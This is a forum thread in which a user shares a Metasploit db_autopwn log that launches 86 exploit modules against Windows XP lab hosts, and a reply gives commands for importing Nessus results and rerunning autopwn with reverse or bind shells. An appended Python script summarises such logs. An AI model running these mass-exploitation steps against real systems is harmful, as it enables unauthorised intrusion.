Metasploit autopwn
I'm using this tool to pentest a clean Windows XP SP2, but it doesn't create any sessions.
When I exploit by hand, everything works, but with it, nothing :(

```
msf > db_driver
[*] Active Driver: sqlite3
[*] Available: sqlite3
[*] DB Support: Enable the mysql driver with the following command:
[*] $ gem install mysql
[*] This gem requires mysqlclient headers, which can be installed on Ubuntu with:
[*] $ sudo apt-get install libmysqlclient-dev
[*] DB Support: Enable the postgresql driver with the following command:
[*] $ gem install postgres-pr
msf > db_create client
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: client
msf > db_nmap 192.168.1.5
Starting Nmap 5.00 ( http://nmap.org ) at 2010-03-31 20:17 MSD
Interesting ports on 192.168.1.5:
Not shown: 996 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2869/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 1.55 seconds
msf > db_autopwn -p -t -e
[*] Analysis completed in 6 seconds (0 vulns / 0 refs)
[*]
[*] ================================================================================
[*] Matching Exploit Modules
[*] ================================================================================
[*] 192.168.1.5:135 exploit/windows/dcerpc/ms03_026_dcom (port match)
[*] 192.168.1.5:139 exploit/linux/samba/lsa_transnames_heap (port match)
[*] 192.168.1.5:139 exploit/multi/samba/nttrans (port match)
[*] 192.168.1.5:139 exploit/multi/samba/usermap_script (port match)
[*] 192.168.1.5:139 exploit/netware/smb/lsass_cifs (port match)
[*] 192.168.1.5:139 exploit/osx/samba/lsa_transnames_heap (port match)
[*] 192.168.1.5:139 exploit/solaris/samba/trans2open (port match)
[*] 192.168.1.5:139 exploit/windows/brightstor/ca_arcserve_342 (port match)
[*] 192.168.1.5:139 exploit/windows/brightstor/etrust_itm_alert (port match)
[*] 192.168.1.5:139 exploit/windows/smb/ms03_049_netapi (port match)
[*] 192.168.1.5:139 exploit/windows/smb/ms04_011_lsass (port match)
[*] 192.168.1.5:139 exploit/windows/smb/ms04_031_netdde (port match)
[*] 192.168.1.5:139 exploit/windows/smb/ms05_039_pnp (port match)
[*] 192.168.1.5:139 exploit/windows/smb/ms06_040_netapi (port match)
[*] 192.168.1.5:139 exploit/windows/smb/ms06_066_nwapi (port match)
[*] 192.168.1.5:139 exploit/windows/smb/ms06_066_nwwks (port match)
[*] 192.168.1.5:139 exploit/windows/smb/ms06_070_wkssvc (port match)
[*] 192.168.1.5:139 exploit/windows/smb/ms08_067_netapi (port match)
[*] 192.168.1.5:139 exploit/windows/smb/msdns_zonename (port match)
[*] 192.168.1.5:139 exploit/windows/smb/netidentity_xtierrpcpipe (port match)
[*] 192.168.1.5:139 exploit/windows/smb/psexec (port match)
[*] 192.168.1.5:139 exploit/windows/smb/timbuktu_plughntcommand_bof (port match)
[*] 192.168.1.5:445 exploit/linux/samba/lsa_transnames_heap (port match)
[*] 192.168.1.5:445 exploit/multi/samba/nttrans (port match)
[*] 192.168.1.5:445 exploit/multi/samba/usermap_script (port match)
[*] 192.168.1.5:445 exploit/netware/smb/lsass_cifs (port match)
[*] 192.168.1.5:445 exploit/osx/samba/lsa_transnames_heap (port match)
[*] 192.168.1.5:445 exploit/solaris/samba/trans2open (port match)
[*] 192.168.1.5:445 exploit/windows/brightstor/ca_arcserve_342 (port match)
[*] 192.168.1.5:445 exploit/windows/brightstor/etrust_itm_alert (port match)
[*] 192.168.1.5:445 exploit/windows/smb/ms03_049_netapi (port match)
[*] 192.168.1.5:445 exploit/windows/smb/ms04_011_lsass (port match)
[*] 192.168.1.5:445 exploit/windows/smb/ms04_031_netdde (port match)
[*] 192.168.1.5:445 exploit/windows/smb/ms05_039_pnp (port match)
[*] 192.168.1.5:445 exploit/windows/smb/ms06_040_netapi (port match)
[*] 192.168.1.5:445 exploit/windows/smb/ms06_066_nwapi (port match)
[*] 192.168.1.5:445 exploit/windows/smb/ms06_066_nwwks (port match)
[*] 192.168.1.5:445 exploit/windows/smb/ms06_070_wkssvc (port match)
[*] 192.168.1.5:445 exploit/windows/smb/ms08_067_netapi (port match)
[*] 192.168.1.5:445 exploit/windows/smb/msdns_zonename (port match)
[*] 192.168.1.5:445 exploit/windows/smb/netidentity_xtierrpcpipe (port match)
[*] 192.168.1.5:445 exploit/windows/smb/psexec (port match)
[*] 192.168.1.5:445 exploit/windows/smb/timbuktu_plughntcommand_bof (port match)
[*] 192.168.1.6:135 exploit/windows/dcerpc/ms03_026_dcom (port match)
[*] 192.168.1.6:139 exploit/linux/samba/lsa_transnames_heap (port match)
[*] 192.168.1.6:139 exploit/multi/samba/nttrans (port match)
[*] 192.168.1.6:139 exploit/multi/samba/usermap_script (port match)
[*] 192.168.1.6:139 exploit/netware/smb/lsass_cifs (port match)
[*] 192.168.1.6:139 exploit/osx/samba/lsa_transnames_heap (port match)
[*] 192.168.1.6:139 exploit/solaris/samba/trans2open (port match)
[*] 192.168.1.6:139 exploit/windows/brightstor/ca_arcserve_342 (port match)
[*] 192.168.1.6:139 exploit/windows/brightstor/etrust_itm_alert (port match)
[*] 192.168.1.6:139 exploit/windows/smb/ms03_049_netapi (port match)
[*] 192.168.1.6:139 exploit/windows/smb/ms04_011_lsass (port match)
[*] 192.168.1.6:139 exploit/windows/smb/ms04_031_netdde (port match)
[*] 192.168.1.6:139 exploit/windows/smb/ms05_039_pnp (port match)
[*] 192.168.1.6:139 exploit/windows/smb/ms06_040_netapi (port match)
[*] 192.168.1.6:139 exploit/windows/smb/ms06_066_nwapi (port match)
[*] 192.168.1.6:139 exploit/windows/smb/ms06_066_nwwks (port match)
[*] 192.168.1.6:139 exploit/windows/smb/ms06_070_wkssvc (port match)
[*] 192.168.1.6:139 exploit/windows/smb/ms08_067_netapi (port match)
[*] 192.168.1.6:139 exploit/windows/smb/msdns_zonename (port match)
[*] 192.168.1.6:139 exploit/windows/smb/netidentity_xtierrpcpipe (port match)
[*] 192.168.1.6:139 exploit/windows/smb/psexec (port match)
[*] 192.168.1.6:139 exploit/windows/smb/timbuktu_plughntcommand_bof (port match)
[*] 192.168.1.6:445 exploit/linux/samba/lsa_transnames_heap (port match)
[*] 192.168.1.6:445 exploit/multi/samba/nttrans (port match)
[*] 192.168.1.6:445 exploit/multi/samba/usermap_script (port match)
[*] 192.168.1.6:445 exploit/netware/smb/lsass_cifs (port match)
[*] 192.168.1.6:445 exploit/osx/samba/lsa_transnames_heap (port match)
[*] 192.168.1.6:445 exploit/solaris/samba/trans2open (port match)
[*] 192.168.1.6:445 exploit/windows/brightstor/ca_arcserve_342 (port match)
[*] 192.168.1.6:445 exploit/windows/brightstor/etrust_itm_alert (port match)
[*] 192.168.1.6:445 exploit/windows/smb/ms03_049_netapi (port match)
[*] 192.168.1.6:445 exploit/windows/smb/ms04_011_lsass (port match)
[*] 192.168.1.6:445 exploit/windows/smb/ms04_031_netdde (port match)
[*] 192.168.1.6:445 exploit/windows/smb/ms05_039_pnp (port match)
[*] 192.168.1.6:445 exploit/windows/smb/ms06_040_netapi (port match)
[*] 192.168.1.6:445 exploit/windows/smb/ms06_066_nwapi (port match)
[*] 192.168.1.6:445 exploit/windows/smb/ms06_066_nwwks (port match)
[*] 192.168.1.6:445 exploit/windows/smb/ms06_070_wkssvc (port match)
[*] 192.168.1.6:445 exploit/windows/smb/ms08_067_netapi (port match)
[*] 192.168.1.6:445 exploit/windows/smb/msdns_zonename (port match)
[*] 192.168.1.6:445 exploit/windows/smb/netidentity_xtierrpcpipe (port match)
[*] 192.168.1.6:445 exploit/windows/smb/psexec (port match)
[*] 192.168.1.6:445 exploit/windows/smb/timbuktu_plughntcommand_bof (port match)
[*] ================================================================================
[*]
[*]
[*] (1/86 [0 sessions]): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.1.5:135...
[*] (2/86 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.1.5:139...
[*] (3/86 [0 sessions]): Launching exploit/multi/samba/nttrans against 192.168.1.5:139...
[*] (4/86 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.1.5:139...
[*] (5/86 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 192.168.1.5:139...
[*] (6/86 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.1.5:139...
[*] (7/86 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.1.5:139...
[*] (8/86 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.1.5:139...
[*] (9/86 [0 sessions]): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.1.5:139...
[*] (10/86 [0 sessions]): Launching exploit/windows/smb/ms03_049_netapi against 192.168.1.5:139...
[*] (11/86 [0 sessions]): Launching exploit/windows/smb/ms04_011_lsass against 192.168.1.5:139...
[*] (12/86 [0 sessions]): Launching exploit/windows/smb/ms04_031_netdde against 192.168.1.5:139...
[*] (13/86 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.1.5:139...
[*] (14/86 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.1.5:139...
[*] (15/86 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.1.5:139...
[*] (16/86 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.1.5:139...
[*] (17/86 [0 sessions]): Launching exploit/windows/smb/ms06_070_wkssvc against 192.168.1.5:139...
[*] (18/86 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.1.5:139...
[*] (19/86 [0 sessions]): Launching exploit/windows/smb/msdns_zonename against 192.168.1.5:139...
[*] (20/86 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.1.5:139...
[*] (21/86 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.1.5:139...
[*] (22/86 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.1.5:139...
[*] (23/86 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.1.5:445...
[*] (24/86 [0 sessions]): Launching exploit/multi/samba/nttrans against 192.168.1.5:445...
[*] (25/86 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.1.5:445...
[*] (26/86 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 192.168.1.5:445...
[*] (27/86 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.1.5:445...
[*] (28/86 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.1.5:445...
[*] (29/86 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.1.5:445...
[*] (30/86 [0 sessions]): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.1.5:445...
[*] (31/86 [0 sessions]): Launching exploit/windows/smb/ms03_049_netapi against 192.168.1.5:445...
[*] (32/86 [0 sessions]): Launching exploit/windows/smb/ms04_011_lsass against 192.168.1.5:445...
[*] (33/86 [0 sessions]): Launching exploit/windows/smb/ms04_031_netdde against 192.168.1.5:445...
[*] (34/86 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.1.5:445...
[*] (35/86 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.1.5:445...
[*] (36/86 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.1.5:445...
[*] (37/86 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.1.5:445...
[*] (38/86 [0 sessions]): Launching exploit/windows/smb/ms06_070_wkssvc against 192.168.1.5:445...
[*] (39/86 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.1.5:445...
[*] (40/86 [0 sessions]): Launching exploit/windows/smb/msdns_zonename against 192.168.1.5:445...
[*] (41/86 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.1.5:445...
[*] (42/86 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.1.5:445...
[*] (43/86 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.1.5:445...
[*] (44/86 [0 sessions]): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.1.6:135...
[*] (45/86 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.1.6:139...
[*] (46/86 [0 sessions]): Launching exploit/multi/samba/nttrans against 192.168.1.6:139...
[*] (47/86 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.1.6:139...
[*] (48/86 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 192.168.1.6:139...
[*] (49/86 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.1.6:139...
[*] (50/86 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.1.6:139...
[*] (51/86 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.1.6:139...
[*] (52/86 [0 sessions]): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.1.6:139...
[*] (53/86 [0 sessions]): Launching exploit/windows/smb/ms03_049_netapi against 192.168.1.6:139...
[*] (54/86 [0 sessions]): Launching exploit/windows/smb/ms04_011_lsass against 192.168.1.6:139...
[*] (55/86 [0 sessions]): Launching exploit/windows/smb/ms04_031_netdde against 192.168.1.6:139...
[*] (56/86 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.1.6:139...
[*] (57/86 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.1.6:139...
[*] (58/86 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.1.6:139...
[*] (59/86 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.1.6:139...
[*] (60/86 [0 sessions]): Launching exploit/windows/smb/ms06_070_wkssvc against 192.168.1.6:139...
[*] (61/86 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.1.6:139...
[*] (62/86 [0 sessions]): Launching exploit/windows/smb/msdns_zonename against 192.168.1.6:139...
[*] (63/86 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.1.6:139...
[*] (64/86 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.1.6:139...
[*] (65/86 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.1.6:139...
[*] (66/86 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.1.6:445...
[*] (67/86 [0 sessions]): Launching exploit/multi/samba/nttrans against 192.168.1.6:445...
[*] (68/86 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.1.6:445...
[*] (69/86 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 192.168.1.6:445...
[*] (70/86 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.1.6:445...
[*] (71/86 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.1.6:445...
[*] (72/86 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.1.6:445...
[*] (73/86 [0 sessions]): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.1.6:445...
[*] (74/86 [0 sessions]): Launching exploit/windows/smb/ms03_049_netapi against 192.168.1.6:445...
[*] (75/86 [0 sessions]): Launching exploit/windows/smb/ms04_011_lsass against 192.168.1.6:445...
[*] (76/86 [0 sessions]): Launching exploit/windows/smb/ms04_031_netdde against 192.168.1.6:445...
[*] (77/86 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.1.6:445...
[*] (78/86 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.1.6:445...
[*] (79/86 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.1.6:445...
[*] (80/86 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.1.6:445...
[*] (81/86 [0 sessions]): Launching exploit/windows/smb/ms06_070_wkssvc against 192.168.1.6:445...
[*] (82/86 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.1.6:445...
[*] (83/86 [0 sessions]): Launching exploit/windows/smb/msdns_zonename against 192.168.1.6:445...
[*] (84/86 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.1.6:445...
[*] (85/86 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.1.6:445...
[*] (86/86 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.1.6:445...
[*] (86/86 [0 sessions]): Waiting on 26 launched modules to finish execution...
[*] (86/86 [0 sessions]): Waiting on 1 launched modules to finish execution...
[*] (86/86 [0 sessions]): Waiting on 1 launched modules to finish execution...
[*] (86/86 [0 sessions]): Waiting on 0 launched modules to finish execution...
[*] The autopwn command has completed with 0 sessions
```

P.S. Sorry if anything is off, I don't know how to add a spoiler. A request to the moderator: please format the message so that it looks normal, because I'm no good at HTML :( |
Try this: start Nessus, scan your IP, then export the report in .nessus format. Create a database in Metasploit:

    db_create

then load the plugin:

    load db_tracker

load the .nessus report itself (after first dropping it into the /home/*USER*/ folder):

    db_import_nessus_xml /home/*USER*/1.nessus

Check for extraneous hosts:

    db_hosts

If there are extraneous hosts, delete them (example: db_del_host 127.0.0.1)

Check the ports (or rather, whether the report loaded correctly):

    db_services

Check the vulnerabilities:

    db_vulns

Once you have checked everything, run:

    db_autopwn -p -e

(using -t is not necessary, it just prints the list of all vulnerabilities for the report's ports)

Also try using reverse_tcp:

    db_autopwn -p -e -r or -b |
| Time: 06:15 |
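An added example, not part of either post: a small Python summary of a `db_autopwn` console log like the one quoted in the question, reporting how modules were selected, how many are written for a platform other than the stated Windows target, and which hosts in the match table were never scanned in the logged session (the situation the `db_hosts` check in the answer is meant to catch). The names `summarize`, `first_int` and `target_platform` are hypothetical, and the sample log is a constructed excerpt in the thread's format.

```python
import re
from collections import Counter

# Constructed excerpt in the format of the db_autopwn output quoted in the thread.
SAMPLE_LOG = """\
msf > db_nmap 192.168.1.5
Interesting ports on 192.168.1.5:
msf > db_autopwn -p -t -e
[*] Analysis completed in 6 seconds (0 vulns / 0 refs)
[*] 192.168.1.5:135 exploit/windows/dcerpc/ms03_026_dcom (port match)
[*] 192.168.1.5:139 exploit/linux/samba/lsa_transnames_heap (port match)
[*] 192.168.1.5:445 exploit/windows/smb/ms08_067_netapi (port match)
[*] 192.168.1.6:445 exploit/osx/samba/lsa_transnames_heap (port match)
[*] 192.168.1.6:445 exploit/windows/smb/ms08_067_netapi (port match)
[*] The autopwn command has completed with 0 sessions
"""

IP = r"\d+\.\d+\.\d+\.\d+"
MATCH = re.compile(rf"\[\*\]\s+({IP}):(\d+)\s+exploit/(\w+)/\S+\s+\((\w+) match\)")
SCANNED = re.compile(rf"Interesting ports on ({IP})")
VULNS = re.compile(r"\((\d+) vulns / \d+ refs\)")
SESSIONS = re.compile(r"completed with (\d+) sessions")


def first_int(pattern, log):
    """Return the first captured number, or None if the line is absent."""
    found = pattern.search(log)
    return int(found.group(1)) if found else None


def summarize(log, target_platform="windows"):
    """Summarize one run; target_platform is an assumption supplied by the reader."""
    matches = MATCH.findall(log)  # tuples of (host, port, platform, match kind)
    scanned = set(SCANNED.findall(log))
    return {
        "vulns": first_int(VULNS, log),
        "sessions": first_int(SESSIONS, log),
        # How each module was selected: "port" means by open port only.
        "match_kinds": dict(Counter(kind for *_, kind in matches)),
        # Modules written for another platform than the stated target.
        "off_platform": sum(p not in (target_platform, "multi") for _, _, p, _ in matches),
        # Hosts in the match table that the nmap run in this log never scanned.
        "unscanned_hosts": sorted({h for h, *_ in matches} - scanned),
    }


if __name__ == "__main__":
    print(summarize(SAMPLE_LOG))
```

On a pentest, a non-empty `unscanned_hosts` list is a scope-control warning: the database still holds hosts from an earlier run.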